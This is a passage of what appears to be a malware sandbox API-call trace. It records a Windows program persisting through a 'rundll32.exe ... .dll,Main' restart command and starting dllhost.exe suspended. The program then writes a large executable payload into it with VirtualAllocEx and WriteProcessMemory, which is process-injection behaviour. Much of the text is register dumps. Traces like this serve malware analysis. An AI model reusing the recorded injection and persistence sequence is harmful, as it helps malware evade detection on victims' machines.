ExtendedRegisters=([0]=0x7f, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x80, [25]=0x1f, [26]=0x0, [27]=0x0, [28]=0xff, [29]=0xff, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0089.464] VirtualFree (lpAddress=0x5c90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0089.466] _snprintf (in: _Dest=0x516f770, _Count=0x3f, _Format="%d" | out: _Dest="1140") returned 4 [0089.466] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.466] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="1140") returned 0x4 [0089.467] strcmp (_Str1="core.crash_handler_pid", _Str2="core.crash_handler") returned 1 [0089.467] strcmp (_Str1="core.crash_handler_pid", _Str2="core.installed_file") returned -1 [0089.467] strcmp (_Str1="core.crash_handler_pid", _Str2="core.restart_cmd") returned -1 [0089.467] strcmp (_Str1="core.crash_handler_pid", _Str2="core.servers") returned -1 [0089.467] strcmp (_Str1="core.crash_handler_pid", _Str2="core.cert_fp") returned 1 [0089.467] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.467] strlen (_Str="1140") returned 0x4 [0089.467] strlen (_Str="core") returned 0x4 [0089.467] strlen (_Str="core") returned 0x4 [0089.468] strlen (_Str="core") returned 0x4 [0089.470] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.472] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x0) returned 0x102 [0089.473] SetEvent (hEvent=0x1dc) returned 1 [0089.473] RegisterWaitForSingleObject (in: phNewWaitObject=0x2601a14, hObject=0x2f8, Callback=0x4de25a8, Context=0x26019fc, dwMilliseconds=0xffffffff, dwFlags=0x8 | out: phNewWaitObject=0x2601a14*=0x2dab8c0) returned 1 [0089.473] ResumeThread (hThread=0x2f4) returned 0x1 [0089.473] CloseHandle (hObject=0x2f4) returned 1 [0089.473] strlen (_Str="core.crash_handler") returned 0x12 [0089.473] strlen (_Str="1") returned 0x1 [0089.473] strlen (_Str="core") returned 0x4 [0089.473] strlen (_Str="core") returned 0x4 [0089.473] strlen (_Str="core") returned 0x4 [0089.476] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.477] strlen (_Str="install_svc") returned 0xb [0089.477] strlen (_Str="core") returned 0x4 [0089.477] strlen (_Str="install_svc") returned 0xb [0089.477] strlen (_Str="install_svc") returned 0xb [0089.477] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.478] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.478] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.478] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.479] strlen (_Str="core") returned 0x4 [0089.479] _snprintf (in: _Dest=0x516fd30, _Count=0x3f, _Format="%d" | out: _Dest="1") returned 1 [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="1") returned 0x1 [0089.480] strcmp (_Str1="core.inject", _Str2="core.crash_handler") returned 1 [0089.480] strcmp (_Str1="core.inject", _Str2="core.installed_file") returned -1 [0089.480] strcmp (_Str1="core.inject", _Str2="core.restart_cmd") returned -1 [0089.480] strcmp (_Str1="core.inject", _Str2="core.servers") returned -1 [0089.480] strcmp (_Str1="core.inject", _Str2="core.cert_fp") returned 1 [0089.480] strlen (_Str="core.inject") returned 0xb [0089.480] strlen (_Str="1") returned 0x1 [0089.480] strlen (_Str="core") returned 0x4 [0089.480] strlen (_Str="core") returned 0x4 [0089.480] strlen (_Str="core") returned 0x4 [0089.483] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat.tmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\454ae93e901dbdaa6732f2a7c8a0c95fc3e0c1b4\\container.dat"), bFailIfExists=0) returned 1 [0089.485] strlen (_Str="install_svc") returned 0xb [0089.485] strlen (_Str="core") returned 0x4 [0089.485] strlen (_Str="install_svc") returned 0xb [0089.485] strlen (_Str="install_svc") returned 0xb [0089.485] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.485] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.485] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.486] strlen (_Str="core") returned 0x4 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="core.restart_cmd") returned 0x10 [0089.487] strlen (_Str="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1") returned 0x77 [0089.487] strcmp (_Str1="core.restart_cmd", _Str2="core.crash_handler") returned 1 [0089.487] strcmp (_Str1="core.restart_cmd", _Str2="core.installed_file") returned 1 [0089.487] strcmp (_Str1="core.restart_cmd", _Str2="core.restart_cmd") returned 0 [0089.487] strlen (_Str="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1") returned 0x77 [0089.487] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2623a28, cbMultiByte=119, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 119 [0089.487] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2623a28, cbMultiByte=119, lpWideCharStr=0x2638980, cchWideChar=119 | out: lpWideCharStr="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1") returned 119 [0089.487] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2a4 [0089.487] UnregisterWaitEx (WaitHandle=0x2dab8c0, CompletionEvent=0x2a4) returned 1 [0089.487] SetEvent (hEvent=0x2a4) returned 1 [0089.487] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0xffffffff) returned 0x0 [0089.487] ResetEvent (hEvent=0x1dc) returned 1 [0089.488] CloseHandle (hObject=0x2a4) returned 1 [0089.488] TerminateProcess (hProcess=0x2f8, uExitCode=0xa) returned 1 [0089.488] CloseHandle (hObject=0x2f8) returned 1 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.488] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.489] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.489] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.489] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.489] strlen (_Str="core.crash_handler_pid") returned 0x16 [0089.489] PathAppendW (in: pszPath="C:\\Windows\\system32", pMore="dllhost.exe" | out: pszPath="C:\\Windows\\system32\\dllhost.exe") returned 1 [0089.489] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\dllhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x516f898*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x516f870 | out: lpCommandLine=0x0, lpProcessInformation=0x516f870*(hProcess=0x2a4, hThread=0x2f8, dwProcessId=0x4bc, dwThreadId=0x244)) returned 1 [0089.491] GetCurrentProcessId () returned 0xaa8 [0089.494] VirtualAllocEx (hProcess=0x2a4, lpAddress=0x0, dwSize=0x1bc, flAllocationType=0x3000, flProtect=0x4) returned 0x60000 [0089.502] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x60000, lpBuffer=0x2638a78*, nSize=0x1bc, lpNumberOfBytesWritten=0x516f55c | out: lpBuffer=0x2638a78*, lpNumberOfBytesWritten=0x516f55c*=0x1bc) returned 1 [0089.502] VirtualAllocEx (hProcess=0x2a4, lpAddress=0x0, dwSize=0x76000, flAllocationType=0x3000, flProtect=0x40) returned 0x150000 [0089.503] WriteProcessMemory (in: hProcess=0x2a4, lpBaseAddress=0x150000, lpBuffer=0x5c90000*, nSize=0x76000, lpNumberOfBytesWritten=0x516f55c | out: lpBuffer=0x5c90000*, lpNumberOfBytesWritten=0x516f55c*=0x76000) returned 1 [0089.509] GetThreadContext (in: hThread=0x2f8, lpContext=0x516f55c | out: lpContext=0x516f55c*(ContextFlags=0x1003f, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x27f, FloatSave.StatusWord=0x0, FloatSave.TagWord=0xffff, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xb0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0xab1609, Ebp=0x0, Eip=0x76f801c4, SegCs=0x23, EFlags=0x202, Esp=0xcfb38, SegSs=0x2b, ExtendedRegisters=([0]=0x7f, [1]=0x2, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x80, [25]=0x1f, [26]=0x0, [27]=0x0, [28]=0xff, [29]=0xff, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, 